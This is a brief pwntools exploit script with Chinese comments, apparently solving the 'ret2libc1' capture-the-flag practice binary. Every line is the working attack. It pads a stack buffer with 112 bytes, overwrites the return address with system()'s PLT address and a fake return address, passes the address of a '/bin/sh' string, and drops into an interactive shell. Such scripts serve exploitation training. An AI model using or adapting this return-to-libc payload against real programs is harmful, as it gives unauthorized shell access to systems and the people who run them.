from pwn import *  
sh = process('./ret2libc1')  # 启动目标程序  
binsh_addr = 0x8048720  # '/bin/sh' 字符串的地址  
system_plt = 0x08048460  # system() 的 PLT 表项地址  
payload = b'a' * 112 + p32(system_plt) + b'b' * 4 + p32(binsh_addr)  # 构造payload  
  
sh.sendline(payload)  # 发送payload  
sh.interactive()  # 获取交互式shell 
